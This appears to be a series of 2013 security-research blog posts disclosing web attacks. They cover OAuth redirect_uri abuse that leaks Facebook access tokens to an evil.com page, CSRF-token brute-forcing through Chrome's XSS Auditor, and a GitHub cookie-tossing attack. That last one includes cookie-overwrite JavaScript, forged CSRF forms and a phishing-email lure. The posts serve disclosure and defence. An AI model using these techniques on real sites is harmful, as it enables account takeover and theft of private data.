This is a short addition to the previous rants on OAuth problems.

We've got Nir Goldshlager working on our side (he simply loves bounties and facebook does pay 'em). We both discovered some vulnerabilities in Facebook and we joined our forces to demonstrate how many potential problems are hidden in OAuth.

TL;DR: all oauth exploits are based on tampering with the redirect_uri parameter.
1 2 3 4
Here I demostrate 2 more threats proving that a flexible redirect_uri is the Achilles Heel of OAuth.



Open redirect is not a severe vulnerability on its own. OWASP says it can lead to "phishing". Yeah, it's almost nothing, but wait:

URI Fragment & 302 Redirects.
What happens if we load http://site1.com/redirect_to_other_site#DATA and  Site1.com responds with Status 302 and Location: evil.com/blabla.

What about #DATA? It's a so called URI Fragment a.k.a location.hash and it's never sent on the Server-side.

The browser simply appends exactly the same value to a new redirect destination. Yeah, it will load evil.com/blabla#DATA.

I have a feeling that is not a reasonable browser feature. I have an even stronger feeling that it opens yet another critical flaw in OAuth.

Any chain of 302 redirects
on any allowed redirect_uri domain (Client's domain myapp.com, sometimes Provider's domain too — facebook.com)
to any page with attacker's Javascript (not necessarily open redirect)
= stolen access_token = Game Over

Steps:
  1. window.open(fb auth/redirect_uri=site.com/redirector&response_type=token) 
  2. We get header:
    Location: http://site.com/redirector#access_token=123
  3. When the browser loads http://site.com/redirector it gets following header
    Location: http://evil.com/path
  4. And now the browser navigates to
    http://evil.com/path#access_token=123
  5. our Javascript leaks the location.hash

and this is...
Why Facebook Adds #_=_

Every time Facebook Connect redirects you to another URL it adds #_=_. It is supposed to kill a "sticky" URI fragment which the browser carries through chain of 302 redirects.

Previously we could use something like
FBAUTH?client_id=approved_app&redirect_uri=ourapp.com
in redirect_uri for other clients as a redirector to our app.

Fb auth for Other client -> Fb auth for Our client#access_token=otherClientToken -> 302 redirect to our app with #access_token of Other client.

Stolen Client Credentials Threat
Consumer keys of official Twitter clients
Is it game over? Currently - yes, both for OAuth1 and 2. Let me explain again response_type=code flow:

  1. redirect to /authorize url with redirect_uri param
  2. it redirects back to redirect_uri?code=123#_=_
  3. now server side obtains access_token sending client creds + used redirect_uri (to prevent leaking through referrer) + code

So if we have client creds we only need to find a document.referrer leaking redirect_uri (it can be any page with <img src="external site..."> or open redirector)

How would you obtain an access_token if redirect_uri would be static?


Oh, wait, there is no such way, because stolen credentials are not a threat if redirect_uri is whitelisted!


The funniest thing with all these rants
Most of our OAuth hacks pwn the Provider and its users (only the most-common vulnerability pwns the Client's authentication). 

This makes me really curious what the hell is wrong with Facebook and why don't they care about their own Graph security and their own users. Why do they allow a flexible redirect_uri, opening an enormous attack surface (their own domain + client's app domain)?

We simply play Find-Chain-Of-302-Redirects, Find-XSS-On-Client and Leak-Credentials-Then-Find-Leaking-Redirect_uri games. Don't they understand it is clearly their business to protect themselves from non ideal clients?


A good migration technique could be based on recording the most used redirect_uri for every Client (most of rails apps use site.com/auth/facebook/callback) and then setting those redirect_uris as the whitelisted ones.

P.S. Although, as bounty hunters, me, @isciurus and Nir are OK with the current situation. There is so much $$$ floating around redirect_uri...

P.S.2 feel free to fix my language and grammar, I get many people asking to elaborate some paragraphs.

Thursday, March 14, 2013

Brute-Forcing Scripts in Google Chrome

A while ago I found leaking document.referrer vulnerability and even used it to hack Facebook.

It's Chrome's XSS Auditor again (severity = medium, no bounty again). Can be used with websites serving X-XSS-Protection: 1;mode=block header.

TL;DR there is a fast way to detect and extract content of your scripts.

Even after fixing document.referrer bug it is still possible to detect if Auditor  banned our payload checking location.href=='about:blank' (I remind you that about:blank inherits opener's origin).

XSS Auditor searches every string between "<script>" and first comma or (first 100 characters) against POST body, GET query string and location.hash content.

Scripts, events on* and javascript:* links often contain private information.

Following values can be extracted:
<a onclick="switch_off()"
<script>username='homakov',
<script>email='homakov@gmail.com',
<script>pin=87542,
<script>data={csrf_token:'aBc123dE',
<a href="javascript:fn(123)

I simply send tons of possible payloads and if some page was banned (payload was found in the source code) then we found which bunch contains the real content of script.

'map-reduce'-like technique:
  1. open 10 windows (10 for simplicity, we can use 25 windows. if target has no X-Frame-Options it can be way faster with <iframe>s) containing specific bunches of possible payloads:
    <script>pin=1<script>pin=2<script>pin=3<script>pin=4...
    from 1 to 1000000, from 1000000 to 2000000, from 2000000 to 3000000 etc
  2. if, say, second window was banned we should do the same procedure and open new windows with:
    from 1 000 000 to 1 100 000, from 1 100 000 to 1 200 000 etc and so on
  3. finally let's open 10 windows with  1 354 030, 1 354 031, 1 354 032, 1 354 033 ... and detect exact value hidden inside of <script> on the target page.
Definitely pwns your privacy but is it..

Feasible to brute force CSRF token?
1) XSS auditor is case insensitive, it makes bruteforce simpler: a-z instead of a-zA-Z.
2) csrf tokens happen to be quite short, 6-10 symbols.
3) 36 ^ 6 = 2176782336
4) every bunch checks 5 000 000 variants, We need 500 bunches
5) 25 windows per 10 seconds.  - 200 seconds.
6) now we found bunch containing real value — keep map-reducing this bunch and find the exact value - another 50-60 seconds
8) this value is case insensitive - to exploit it you should provide all possible cases of letters. around 50 requests and one of them will be successful.

200s (find 5 000 000 bunch containing real token)
+ 50s (detect real token in specific bunch)
+ 10s (send 50 malicious requests using <form>+iframe with all possible cases)
= 260s

approximately, exploitation time for different token size:
6 characters — 4.5 minutes
7 characters — 120 minutes
8 characters — 72 hours
Saving checked bunches in the cookie (next time you will continue with other bunches) + using location.hash (it is not sent on server side and can be very long) = plausible CSRF token brute force.

PoC — extract "<script>pin=162621"

Moral:
  • use 8+ characters in the CSRF token
  • all kinds of detections are bad. There is no innocent detections. A small weak spot can be used in a dangerous exploit.
    Today I found a way to brute-force 25 000 000 URLs / minute using location.hash detection (WontFix!). And keep making it faster. 
Bonus, how to keep malicious page opened for a long time:

Friday, March 8, 2013

Hacking Github with Webkit

Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect.....

TL;DR: Github is vulnerable to cookie tossing. We can fixate _csrf_token value using a Webkit bug and then execute any authorized requests.

Github Pages

Plain HTML pages can served from yourhandle.github.com. These HTML pages may contain Javascript code.
Wait.
Custom JS on your subdomains is a bad idea:
  1. If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain
  2. Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website.

Webkit & cookies order

Our browsers send cookies this way:

Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;

Please have in mind that Original _gh_sess and Dropped _gh_sess are two completely different cookies! They only share same name.
Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com.
Rack (a common interface for ruby web applications) uses the first one:

cookies.each { |k,v| hash[k] = Array === v ? v.first : v }

Here's another thing, Webkit  (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and even not by httpOnly (they should go first obviously).
It orders them by the creation time (I might be wrong here, but this is how it looks like).

First of all let's have a look at the HACKED cookie.

PROTIP — save it as decoder.rb and decode sessions faster:


ruby decoder.rb
BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b

{:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="}
  1. on a subdomain we create _gh_sess=HACKED; Domain=.github.com
  2. window.open('https://github.com'). Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;
  3. Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly ....
  4. This made our HACKED cookie older then freshly received ORIGINAL cookie. Repeat request: 
  5. window.open('https://github.com'). Browser sends:
    Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL;
  6. Server response: Set-Cookie:_gh_sess=HACKED; httponly ....
  7. Voila, we fixated it in Domain=github.com httponly cookie. Now both Domain=.github.com and Domain=github.com cookies have the same HACKED value.
  8. destroy the Dropped cookie, the mission is accomplished:   document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present)

It will make you a guest user (logged out) but after logging in values will remain the same.

Steps:

  1. let's choose our target. We discussed XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad and Pagebox technique or Domain-splitting would fix this.

    We don't need XSS now since we fixated the CSRF token.
    (CSRF attack is almost as serious as XSS. Main profit of XSS - it can read responses. CSRF is write-only).

  2. So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber.
  3. I send an email to the Githubber.
    "Hey, check out new HTML5 puzzle! http://blabla.github.com/html5_game"
  4. the Githubber opens the game and it executes the following javascript — replaces his _gh_sess with HACKED (session fixation):

  5. HACKED session is user_id-less (guest session). It simply contains session_id and _csrf_token, no certain user is specified there.
    So the Game asks him explictely: please Star us on github (or smth like this) <link>.
    He may feel confused (a little bit) to be logged out. Anyway, he logs in again.
  6. user_id in session belongs to the Githubber, but _csrf_token is still ours!
  7. Meanwhile, the Evil game inserts <script src=/done.js> every 1 second.
    It contains done(false) by default — it means, keep submitting the form to iframe :

    <form target=irf action="https://github.com/github/github/opensource" method="post">
    <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="
    </form>
  8. At the same time every 1 second I execute on my machine:
    git clone git://github.com/github/github.git 
  9. As soon as the repo is opensourced my clone request will be accepted. Then I change /done.js: "done(true)". This will make Evil game to submit similar form and make github/github private again:

    <form target=irf action="https://github.com/github/github/privatesource" method="post">
    <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="
    </form>
  10. the Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=

    Forever
    . (only cookies reset will update it)



Fast fix — now github expires Domain=.github.com cookie, if 2 _gh_sess cookies were sent on https://github.com/*.
It kills HACKED just before it becomes older than ORIGINAL.

Proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as dashboard and blogspot.com for blogs.

Last time I promised to publish an OAuth security insight

This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy).

P.S.
I reported the fixation issue privately only because I'm a good guy and was in a good mood.
Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer.
Perhaps, tumblr has a similar issue. I didn't bother to check

Sunday, March 3, 2013

Contributions, 2012

All the buzz started after the commit that changed my life.
here are some highlights of my contributions, kind of digest.

I did some basic stuff — every newcomer starts with it :P
tried to convince people to fix CSRF, showcasing shitloads of CSRF-vulnerable sites
JSONP
clickjacking
content type verification for JSON input

then spent a while on Rails security:
shameful but effective whitelist by default for mass assignment
getting rid of CSRF-vulnerable 'match' from routes.rb
added default_headers (X-Frame-Options etc) to make Rails apps secure from clickjacking by default
escape_html_entities for JSON.dump
sending nil using XML/JSON params parsers
some whining and XSS showcases on ^$ regexps (no success here)
my presentation with common cases in Moscow
and just plain posts on the future of Rails security  1,2.

played with OAuth:
hijacking account, another hijacking, some other vulns and final post — OAuth1, OAuth2, OAuth...? 

browser security
disclosure of URL and HASH (quite slow but race-condition standard is a vulnerability anyway)
passwords-autofill

theoretical posts on how to make Web perfect

rethinking cookies: Origin Only
Pagebox - XSS sandbox

Last year was not so bad, next should be more productive.

I am going to focus on defensive security (pagebox), Ruby security gems (for rack based apps), authorization techniques (OAuth is getting more popular != better) and financial security.

Also there is not much to do with Rails - it's well secured now! Thus I am choosing a new framework, likely, nodejs or lift.